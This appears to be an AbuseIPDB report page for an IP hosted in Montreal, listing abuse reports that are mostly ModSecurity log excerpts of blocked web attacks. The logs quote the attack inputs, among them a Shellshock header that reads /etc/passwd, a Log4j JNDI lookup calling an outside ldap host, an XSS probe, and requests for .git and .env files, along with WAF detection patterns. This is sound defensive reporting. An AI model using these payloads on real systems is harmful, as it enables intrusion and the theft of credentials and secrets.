JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 104.233.20.71

104.233.20.71 was found in our database!

This IP was reported 24 times. Confidence of Abuse is 0%: ?

ISP	FASTPLANET LTD
Usage Type	Data Center/Web Hosting/Transit
ASN	AS9009
Domain Name	fastplanet.com
Country	🇨🇦 Canada
City	Montreal, Quebec

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 104.233.20.71

Whois 104.233.20.71

IP Abuse Reports for 104.233.20.71:

This IP address has been reported a total of 24 times from 6 distinct sources. 104.233.20.71 was first reported on October 30th 2023, and the most recent report was 4 months ago.

Old Reports: The most recent abuse report for this IP address is from 4 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 TPI-Abuse	2026-01-17 21:59:36 (4 months ago)	(mod_security) mod_security (id:210492) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210492) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jan 17 16:59:30.847803 2026] [security2:error] [pid 18237:tid 18237] [client 104.233.20.71:49831] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcalendars.nbcnewsradio.com"] [uri "/events../.git/config"] [unique_id "aWwGQmMenFOhahP7xuGjVgAAAAM"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-12-29 17:37:22 (5 months ago)	(mod_security) mod_security (id:210730) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210730) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Dec 29 12:34:13.626056 2025] [security2:error] [pid 27842:tid 28099] [client 104.233.20.71:48949] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|www.staging.kettlehill.com\|F\|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "staging.kettlehill.com"] [uri "/moveitisapi/moveitisapi.dll"] [unique_id "aVK7laihNXaj9f6vryeNGgAAAFA"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-12-03 03:53:24 (6 months ago)	(mod_security) mod_security (id:221260) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:221260) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Dec 02 22:53:19.938261 2025] [security2:error] [pid 27655:tid 27655] [client 104.233.20.71:59569] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\$\\\$\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)\|\|cpcontacts.farmers123.com:80\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcontacts.farmers123.com"] [uri "/"] [unique_id "aS-0L5LAyPkQGHGO1AhYFgAAABU"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-11-13 15:00:23 (6 months ago)	(mod_security) mod_security (id:212620) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:212620) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 13 10:00:09.917084 2025] [security2:error] [pid 9658:tid 9658] [client 104.233.20.71:55687] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<script\\\\b" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/07_XSS_XSS.conf"] [line "65"] [id "212620"] [rev "4"] [msg "COMODO WAF: Cross-site Scripting (XSS) Attack\|\|ftp.nbcnewsradio.com\|F\|2"] [data "Matched Data: <script found within REQUEST_URI: /oauth/idp/logout?post_logout_redirect_uri=<script>console.log(`xss`)</script>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "ftp.nbcnewsradio.com"] [uri "/oauth/idp/logout"] [unique_id "aRXyeQZS3wn-mMHJ2voimAAAAB8"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-11-01 14:23:10 (7 months ago)	(mod_security) mod_security (id:248270) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:248270) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Nov 01 10:23:00.165467 2025] [security2:error] [pid 27531:tid 27550] [client 104.233.20.71:57883] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?\|rmi\|dns\|iiop\|nis\|nds\|corba\|\\\\$\\\\{(?:lower\|upper)):" at REQUEST_HEADERS:Accept. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j\|\|ftp.kettlehill.com:443\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "ftp.kettlehill.com"] [uri "/"] [unique_id "aQYXxH2WO2IkxYJ6zsL9LAAAARE"], referer: ${jndi:ldap://${:-925}${:-149}.${hostName}.referer.d431edhnpe1sijb6tq70kb1ynbhftm9nu.rsfi.info} show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-07-27 00:21:00 (10 months ago)	(mod_security) mod_security (id:210492) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210492) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jul 26 20:20:42.330520 2025] [security2:error] [pid 172229:tid 172486] [client 104.233.20.71:41139] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "whm.staging.kettlehill.com"] [uri "/.env_sample"] [unique_id "aIVw2uZd-uShJ73phjv2CQAAARU"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-05-29 19:57:42 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210492) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu May 29 15:57:33.510751 2025] [security2:error] [pid 3374448:tid 3374448] [client 104.233.20.71:52221] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "whm.farmers123.com"] [uri "/.env.example"] [unique_id "aDi8LbTbP6eEhf5KMIJSQAAAAAE"] show less	Brute-Force Bad Web Bot Web App Attack
🇦🇺 MAGIC	2025-03-01 04:09:53 (1 year ago)	VM1 Bad user agents ignoring web crawling rules. Draing bandwidth	DDoS Attack Bad Web Bot
🇺🇸 TPI-Abuse	2025-02-28 21:35:38 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Port ... show more (mod_security) mod_security (id:210492) triggered by 104.233.20.71 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Feb 28 16:35:24.922433 2025] [security2:error] [pid 3487:tid 3605] [client 104.233.20.71:57305] [client 104.233.20.71] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "whm.kettlehill.com"] [uri "/.env.bak"] [unique_id "Z8IsHL-UIro-HlcNVlC4BAAAAQQ"] show less	Brute-Force Bad Web Bot Web App Attack
🇦🇺 MAGIC	2025-02-09 22:07:53 (1 year ago)	VM1 Bad user agents ignoring web crawling rules. Draing bandwidth	DDoS Attack Bad Web Bot
Anonymous	2025-01-15 07:10:06 (1 year ago)	\| Common web attack.	Hacking SQL Injection Web App Attack
🇸🇪 peterh	2025-01-04 08:49:00 (1 year ago)	104.233.20.71 - - [04/Jan/2025:03:25:22 +0100] "HEAD / HTTP/1.1	Phishing Hacking
Anonymous	2024-11-21 00:53:34 (1 year ago)	alibaba cloud ddos like web scan	Bad Web Bot
Anonymous	2024-11-14 00:28:32 (1 year ago)	alibaba cloud ddos like web scan	Bad Web Bot
Anonymous	2024-11-01 07:51:14 (1 year ago)	alibaba cloud ddos like web scan	Bad Web Bot

Showing 1 to 15 of 24 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇳🇱 185.223.235.13

🇱🇺 64.89.160.167

🇳🇱 45.148.10.157

🇧🇪 34.38.151.74

🇺🇸 2001:470:1:c84::289

🇺🇸 216.103.12.17

🇺🇸 194.49.5.18

🇫🇷 144.91.113.94

🇹🇭 203.154.158.195

🇳🇱 195.178.110.30

🇬🇧 195.96.139.45

🇬🇧 185.69.145.11

🇧🇷 170.238.160.191

🇫🇷 149.50.220.155

🇨🇳 125.124.226.217

🇳🇱 91.92.42.28

🇺🇸 63.42.245.167

🇨🇳 60.16.222.92

🇳🇱 176.65.148.242

🇺🇸 147.93.183.178